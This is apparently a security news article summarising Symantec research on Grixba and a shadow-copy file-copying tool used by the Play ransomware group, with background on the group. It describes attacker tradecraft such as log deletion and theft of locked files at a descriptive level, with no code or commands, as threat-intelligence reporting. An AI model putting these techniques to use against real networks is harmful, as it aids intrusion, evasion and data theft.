Play Ransomware Group Deploys Custom Tools to Extract Data from Locked Systems

Play Ransomware

The Play ransomware group has developed two custom tools to infiltrate compromised networks, enumerate users and computers, and copy files from the Volume Shadow Copy Service (VSS) that are usually locked by the operating system. Researchers at Symantec discovered these tools, which are designed to make attacks more efficient and reduce dwell time, giving ransomware operators greater control over their operations.

The first tool, Grixba (Infostealer.Grixba), is a network-scanning tool that enumerates all users and computers in a domain. Grixba is developed using the Costura development tool, which embeds the application’s dependencies into a single executable file. The malware checks for the existence of security and backup software, remote administration tools, and other programs, saving the gathered information in CSV files that are compressed into a ZIP file for later manual exfiltration by the threat actors.

Grixba operates in three modes: Scan mode, Scanall mode, and Clr mode. Scan mode checks for specific security programs, backup software, and remote administration tools, while Scanall mode expands the search to a broader list of programs. Clr mode deletes logs from local and remote computers and enumerates specific registry keys to delete logs.

The second tool, a VSS Copying Tool, was also developed with the Costura tool. It embeds the AlphaVSS library into executables, providing a high-level interface for interacting with VSS. The tool enables the attackers to copy files from VSS volumes on compromised machines before encryption, giving them access to files that would normally be locked by the operating system.

Play ransomware, also known as PlayCrypt and developed by a group Symantec tracks as Balloonfly, was launched in June 2022. It has been responsible for numerous high-profile attacks and is known for targeting Microsoft Exchange vulnerabilities. Play is also one of the first ransomware groups to employ intermittent encryption, allowing for faster encryption of victims’ systems. Interestingly, Balloonfly seems to carry out ransomware attacks and develop the malware, as it doesn’t operate as a ransomware-as-a-service.

The use of custom tools is on the rise among ransomware gangs, as they can be tailored to specific target environments, allowing for faster and more efficient attacks. By keeping their tools proprietary and exclusive, ransomware gangs maintain a competitive advantage and maximize profits.